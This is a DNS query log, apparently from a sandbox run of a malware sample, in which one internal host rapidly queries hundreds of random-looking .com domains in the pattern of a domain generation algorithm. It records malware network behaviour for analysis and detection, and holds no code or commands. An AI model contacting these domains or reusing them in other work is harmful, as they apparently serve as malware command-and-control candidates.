Nov 11, 2024 18:13:36.259588003 CET	192.168.2.6	1.1.1.1	0x4058	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.261053085 CET	192.168.2.6	1.1.1.1	0x224c	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.264192104 CET	192.168.2.6	1.1.1.1	0x242e	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.264869928 CET	192.168.2.6	1.1.1.1	0xb809	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.265335083 CET	192.168.2.6	1.1.1.1	0xae72	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.272152901 CET	192.168.2.6	1.1.1.1	0x1996	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.474531889 CET	192.168.2.6	1.1.1.1	0x87d1	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.493403912 CET	192.168.2.6	1.1.1.1	0x61df	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.543286085 CET	192.168.2.6	1.1.1.1	0xa128	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.553842068 CET	192.168.2.6	1.1.1.1	0x865e	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.581387997 CET	192.168.2.6	1.1.1.1	0xe55f	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.587686062 CET	192.168.2.6	1.1.1.1	0x3d9b	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.590895891 CET	192.168.2.6	1.1.1.1	0x559f	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.602828026 CET	192.168.2.6	1.1.1.1	0x83fe	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.606230974 CET	192.168.2.6	1.1.1.1	0xa829	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.631724119 CET	192.168.2.6	1.1.1.1	0x124c	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.634236097 CET	192.168.2.6	1.1.1.1	0x8c8c	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.637444973 CET	192.168.2.6	1.1.1.1	0xa9cb	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.641716957 CET	192.168.2.6	1.1.1.1	0x5e17	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.647540092 CET	192.168.2.6	1.1.1.1	0xc30c	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.689914942 CET	192.168.2.6	1.1.1.1	0x4833	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.704417944 CET	192.168.2.6	1.1.1.1	0x3134	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.706629992 CET	192.168.2.6	1.1.1.1	0x9de5	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.710891008 CET	192.168.2.6	1.1.1.1	0xe8fb	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.731254101 CET	192.168.2.6	1.1.1.1	0x29ee	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.759833097 CET	192.168.2.6	1.1.1.1	0xdd18	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.760807037 CET	192.168.2.6	1.1.1.1	0x9ee5	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.814865112 CET	192.168.2.6	1.1.1.1	0x75d1	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.832103968 CET	192.168.2.6	1.1.1.1	0x97bf	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.901961088 CET	192.168.2.6	1.1.1.1	0x87d3	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.924376011 CET	192.168.2.6	1.1.1.1	0xd875	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.948390007 CET	192.168.2.6	1.1.1.1	0x19ad	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.952666044 CET	192.168.2.6	1.1.1.1	0x8759	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.993355989 CET	192.168.2.6	1.1.1.1	0xd1de	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.079809904 CET	192.168.2.6	1.1.1.1	0x6e7b	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.139149904 CET	192.168.2.6	1.1.1.1	0x6299	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.145134926 CET	192.168.2.6	1.1.1.1	0x15fb	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.182558060 CET	192.168.2.6	1.1.1.1	0x800c	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.203246117 CET	192.168.2.6	1.1.1.1	0x2cc5	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.218911886 CET	192.168.2.6	1.1.1.1	0x53f5	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.247178078 CET	192.168.2.6	1.1.1.1	0xfaea	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.282207966 CET	192.168.2.6	1.1.1.1	0x18ff	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.812305927 CET	192.168.2.6	1.1.1.1	0x780c	Standard query (0)	gacyvah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.816901922 CET	192.168.2.6	1.1.1.1	0x9563	Standard query (0)	vojypuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.827450991 CET	192.168.2.6	1.1.1.1	0x53e9	Standard query (0)	qetykol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.834781885 CET	192.168.2.6	1.1.1.1	0xea68	Standard query (0)	puvybeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.851094007 CET	192.168.2.6	1.1.1.1	0x1dd6	Standard query (0)	lykysix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.851807117 CET	192.168.2.6	1.1.1.1	0x4cba	Standard query (0)	puryjil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.854623079 CET	192.168.2.6	1.1.1.1	0xb9c7	Standard query (0)	lymymud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.898005962 CET	192.168.2.6	1.1.1.1	0xe864	Standard query (0)	gahypus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.904134035 CET	192.168.2.6	1.1.1.1	0x1903	Standard query (0)	qeqyqiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.904647112 CET	192.168.2.6	1.1.1.1	0x7127	Standard query (0)	lygyxun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.910975933 CET	192.168.2.6	1.1.1.1	0x43d3	Standard query (0)	vopykak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.932883978 CET	192.168.2.6	1.1.1.1	0xd17f	Standard query (0)	qegytyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.933557034 CET	192.168.2.6	1.1.1.1	0x5b24	Standard query (0)	qebynyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.934087992 CET	192.168.2.6	1.1.1.1	0x8be1	Standard query (0)	pujypup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.934683084 CET	192.168.2.6	1.1.1.1	0x2ea8	Standard query (0)	gatykow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.935233116 CET	192.168.2.6	1.1.1.1	0x5568	Standard query (0)	vocybam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.029721022 CET	192.168.2.6	1.1.1.1	0x1369	Standard query (0)	qebyhuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.032075882 CET	192.168.2.6	1.1.1.1	0xe4fd	Standard query (0)	pujycov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.033957958 CET	192.168.2.6	1.1.1.1	0xa08b	Standard query (0)	volybec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.469959021 CET	192.168.2.6	1.1.1.1	0xdb7e	Standard query (0)	vofypuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.470510006 CET	192.168.2.6	1.1.1.1	0x344e	Standard query (0)	puzybep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.470721960 CET	192.168.2.6	1.1.1.1	0x7b5f	Standard query (0)	qeqykog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.471013069 CET	192.168.2.6	1.1.1.1	0xc40e	Standard query (0)	gatyrez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.471175909 CET	192.168.2.6	1.1.1.1	0xc201	Standard query (0)	ganynyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.503146887 CET	192.168.2.6	1.1.1.1	0x71c9	Standard query (0)	lyxyfar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.503499031 CET	192.168.2.6	1.1.1.1	0xd475	Standard query (0)	vowyqoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505188942 CET	192.168.2.6	1.1.1.1	0xe67a	Standard query (0)	qexyfel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505359888 CET	192.168.2.6	1.1.1.1	0x856d	Standard query (0)	gadypuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505523920 CET	192.168.2.6	1.1.1.1	0xdeeb	Standard query (0)	lymyjon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505660057 CET	192.168.2.6	1.1.1.1	0x4ef5	Standard query (0)	gadyzyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505814075 CET	192.168.2.6	1.1.1.1	0xc675	Standard query (0)	galyvas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.505965948 CET	192.168.2.6	1.1.1.1	0xce65	Standard query (0)	lyvyguj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506105900 CET	192.168.2.6	1.1.1.1	0xf8aa	Standard query (0)	lykyvod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506268024 CET	192.168.2.6	1.1.1.1	0x44a0	Standard query (0)	ganyhuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506429911 CET	192.168.2.6	1.1.1.1	0xc81d	Standard query (0)	pupytyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506593943 CET	192.168.2.6	1.1.1.1	0x642d	Standard query (0)	qekyvav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506738901 CET	192.168.2.6	1.1.1.1	0x1e15	Standard query (0)	pufyxug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.506938934 CET	192.168.2.6	1.1.1.1	0xa2c1	Standard query (0)	lysylej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.507266045 CET	192.168.2.6	1.1.1.1	0xe985	Standard query (0)	vonymuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.507451057 CET	192.168.2.6	1.1.1.1	0xf24d	Standard query (0)	vopyret.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.507605076 CET	192.168.2.6	1.1.1.1	0x3f7d	Standard query (0)	puzydal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.507740021 CET	192.168.2.6	1.1.1.1	0x7e20	Standard query (0)	qedytul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.507896900 CET	192.168.2.6	1.1.1.1	0x991f	Standard query (0)	pumyjig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508048058 CET	192.168.2.6	1.1.1.1	0x8357	Standard query (0)	pumymuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508220911 CET	192.168.2.6	1.1.1.1	0xd01	Standard query (0)	galydoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508379936 CET	192.168.2.6	1.1.1.1	0x97f	Standard query (0)	lysytyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508526087 CET	192.168.2.6	1.1.1.1	0x11e8	Standard query (0)	vonyjim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508702040 CET	192.168.2.6	1.1.1.1	0x549f	Standard query (0)	vojycif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508847952 CET	192.168.2.6	1.1.1.1	0x9c19	Standard query (0)	qegyxug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.508996964 CET	192.168.2.6	1.1.1.1	0xd85f	Standard query (0)	lyvynen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.512447119 CET	192.168.2.6	1.1.1.1	0x91b2	Standard query (0)	lyrywax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.513068914 CET	192.168.2.6	1.1.1.1	0x5b86	Standard query (0)	purywop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.523883104 CET	192.168.2.6	1.1.1.1	0xc278	Standard query (0)	lyryjir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.524097919 CET	192.168.2.6	1.1.1.1	0xebbb	Standard query (0)	qetyrap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.527415037 CET	192.168.2.6	1.1.1.1	0x978a	Standard query (0)	puvygyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.528016090 CET	192.168.2.6	1.1.1.1	0x98a2	Standard query (0)	gaqyqis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.528536081 CET	192.168.2.6	1.1.1.1	0xebac	Standard query (0)	gahycib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.530567884 CET	192.168.2.6	1.1.1.1	0xa995	Standard query (0)	gacyfew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.531161070 CET	192.168.2.6	1.1.1.1	0x3cdb	Standard query (0)	volydot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.531856060 CET	192.168.2.6	1.1.1.1	0xb76a	Standard query (0)	vocygyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.531936884 CET	192.168.2.6	1.1.1.1	0xc372	Standard query (0)	qedyleq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.554011106 CET	192.168.2.6	1.1.1.1	0x2b	Standard query (0)	pupylaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.554274082 CET	192.168.2.6	1.1.1.1	0x2ada	Standard query (0)	qekysip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.688395023 CET	192.168.2.6	1.1.1.1	0xc536	Standard query (0)	vofyzym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.868772030 CET	192.168.2.6	1.1.1.1	0x147	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.871701956 CET	192.168.2.6	1.1.1.1	0xe640	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.873779058 CET	192.168.2.6	1.1.1.1	0x260a	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.874294996 CET	192.168.2.6	1.1.1.1	0xfa37	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.875107050 CET	192.168.2.6	1.1.1.1	0x6fee	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.875722885 CET	192.168.2.6	1.1.1.1	0x81f1	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.876954079 CET	192.168.2.6	1.1.1.1	0x1314	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.877285004 CET	192.168.2.6	1.1.1.1	0x3df9	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.877465963 CET	192.168.2.6	1.1.1.1	0xca0a	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.877780914 CET	192.168.2.6	1.1.1.1	0xd154	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.885462999 CET	192.168.2.6	1.1.1.1	0xf412	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.885714054 CET	192.168.2.6	1.1.1.1	0x20b4	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.893357038 CET	192.168.2.6	1.1.1.1	0x772e	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.953562021 CET	192.168.2.6	1.1.1.1	0x6ad8	Standard query (0)	lymygyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.953941107 CET	192.168.2.6	1.1.1.1	0x2641	Standard query (0)	pumygyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.954715967 CET	192.168.2.6	1.1.1.1	0x6f10	Standard query (0)	vofyref.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.956357002 CET	192.168.2.6	1.1.1.1	0x7176	Standard query (0)	qekyxul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.965205908 CET	192.168.2.6	1.1.1.1	0xdfb3	Standard query (0)	puzyciq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.965380907 CET	192.168.2.6	1.1.1.1	0xf3a4	Standard query (0)	gadyrab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.981863976 CET	192.168.2.6	1.1.1.1	0x28d4	Standard query (0)	volycik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.982069969 CET	192.168.2.6	1.1.1.1	0x3cce	Standard query (0)	ganyfes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.993200064 CET	192.168.2.6	1.1.1.1	0x2781	Standard query (0)	pupywog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.993321896 CET	192.168.2.6	1.1.1.1	0x8532	Standard query (0)	pujyxyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.004200935 CET	192.168.2.6	1.1.1.1	0xb3ee	Standard query (0)	gahyzez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.004396915 CET	192.168.2.6	1.1.1.1	0xbb1d	Standard query (0)	lyrymuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.047667980 CET	192.168.2.6	1.1.1.1	0xa7bc	Standard query (0)	vonygec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.057221889 CET	192.168.2.6	1.1.1.1	0x8e78	Standard query (0)	vonybat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.061289072 CET	192.168.2.6	1.1.1.1	0xcb8b	Standard query (0)	puvycip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.061706066 CET	192.168.2.6	1.1.1.1	0x4462	Standard query (0)	volypum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.062974930 CET	192.168.2.6	1.1.1.1	0x8d8e	Standard query (0)	pufylap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.084691048 CET	192.168.2.6	1.1.1.1	0x593a	Standard query (0)	qexysig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.090111017 CET	192.168.2.6	1.1.1.1	0x559	Standard query (0)	puzypug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.091223955 CET	192.168.2.6	1.1.1.1	0xade4	Standard query (0)	qedykiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.091407061 CET	192.168.2.6	1.1.1.1	0x5a5	Standard query (0)	galypyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.117126942 CET	192.168.2.6	1.1.1.1	0xca05	Standard query (0)	pumybal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.117333889 CET	192.168.2.6	1.1.1.1	0x2920	Standard query (0)	lysyjid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.121280909 CET	192.168.2.6	1.1.1.1	0x8b5d	Standard query (0)	vofykoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.121459007 CET	192.168.2.6	1.1.1.1	0x81bf	Standard query (0)	galycuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.121633053 CET	192.168.2.6	1.1.1.1	0xf0	Standard query (0)	qexyvoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.121916056 CET	192.168.2.6	1.1.1.1	0xb2ad	Standard query (0)	ganyvoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.122118950 CET	192.168.2.6	1.1.1.1	0x96f3	Standard query (0)	pupyjuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.122638941 CET	192.168.2.6	1.1.1.1	0x4500	Standard query (0)	lymyner.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.122818947 CET	192.168.2.6	1.1.1.1	0x4a21	Standard query (0)	vojyrak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.122992992 CET	192.168.2.6	1.1.1.1	0x89b7	Standard query (0)	qedyrag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.123990059 CET	192.168.2.6	1.1.1.1	0x19a2	Standard query (0)	lykyxur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.124181986 CET	192.168.2.6	1.1.1.1	0x3083	Standard query (0)	lysywon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.124552011 CET	192.168.2.6	1.1.1.1	0x5606	Standard query (0)	qeqynel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.126095057 CET	192.168.2.6	1.1.1.1	0xefae	Standard query (0)	pujyteq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.131333113 CET	192.168.2.6	1.1.1.1	0x11b5	Standard query (0)	lykytej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.132174015 CET	192.168.2.6	1.1.1.1	0x4470	Standard query (0)	gadykos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.134732962 CET	192.168.2.6	1.1.1.1	0x262b	Standard query (0)	vowyjut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.134900093 CET	192.168.2.6	1.1.1.1	0x999e	Standard query (0)	qebyvop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.135834932 CET	192.168.2.6	1.1.1.1	0x7165	Standard query (0)	lyxysun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.136441946 CET	192.168.2.6	1.1.1.1	0x31a9	Standard query (0)	pufytev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.136986017 CET	192.168.2.6	1.1.1.1	0x82c8	Standard query (0)	gaqynyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.137166023 CET	192.168.2.6	1.1.1.1	0xb223	Standard query (0)	puvydov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139148951 CET	192.168.2.6	1.1.1.1	0xf7c0	Standard query (0)	lygytyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139388084 CET	192.168.2.6	1.1.1.1	0xf291	Standard query (0)	vopyjuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139605045 CET	192.168.2.6	1.1.1.1	0x38f8	Standard query (0)	gaqyhuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139777899 CET	192.168.2.6	1.1.1.1	0x843b	Standard query (0)	qebyfav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139815092 CET	192.168.2.6	1.1.1.1	0x8e51	Standard query (0)	lyvyvix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.139976978 CET	192.168.2.6	1.1.1.1	0xb46e	Standard query (0)	lyvyfad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140039921 CET	192.168.2.6	1.1.1.1	0x9e4	Standard query (0)	vojyzyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140165091 CET	192.168.2.6	1.1.1.1	0x419b	Standard query (0)	vowymyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140239954 CET	192.168.2.6	1.1.1.1	0x6a82	Standard query (0)	lyxyvoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140327930 CET	192.168.2.6	1.1.1.1	0xfd2	Standard query (0)	lygylax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140451908 CET	192.168.2.6	1.1.1.1	0xb4db	Standard query (0)	qeqyhup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140536070 CET	192.168.2.6	1.1.1.1	0x2b37	Standard query (0)	gacydib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140656948 CET	192.168.2.6	1.1.1.1	0x4eeb	Standard query (0)	gatyqih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140707970 CET	192.168.2.6	1.1.1.1	0xab36	Standard query (0)	qegylep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140867949 CET	192.168.2.6	1.1.1.1	0xdebf	Standard query (0)	purymuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.141009092 CET	192.168.2.6	1.1.1.1	0x3ad6	Standard query (0)	vocydof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.141268969 CET	192.168.2.6	1.1.1.1	0x2e74	Standard query (0)	vopyqim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.141370058 CET	192.168.2.6	1.1.1.1	0xff8b	Standard query (0)	qekytyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.154278040 CET	192.168.2.6	1.1.1.1	0x34e1	Standard query (0)	qetyquq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.245146990 CET	192.168.2.6	1.1.1.1	0x8961	Standard query (0)	qebyxyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.246428013 CET	192.168.2.6	1.1.1.1	0x97a3	Standard query (0)	vopygat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.251730919 CET	192.168.2.6	1.1.1.1	0xa767	Standard query (0)	puzytap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.260353088 CET	192.168.2.6	1.1.1.1	0x3b7b	Standard query (0)	galyros.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.260941029 CET	192.168.2.6	1.1.1.1	0xa235	Standard query (0)	gadyhyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.280946016 CET	192.168.2.6	1.1.1.1	0xdfb0	Standard query (0)	lymyvin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.283380032 CET	192.168.2.6	1.1.1.1	0xf5a4	Standard query (0)	volyrac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.295027018 CET	192.168.2.6	1.1.1.1	0x9398	Standard query (0)	qedyhyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.295514107 CET	192.168.2.6	1.1.1.1	0x76b7	Standard query (0)	pumycug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.302598000 CET	192.168.2.6	1.1.1.1	0xc18e	Standard query (0)	lysyger.com	A (IP address)	IN (0x0001)	false
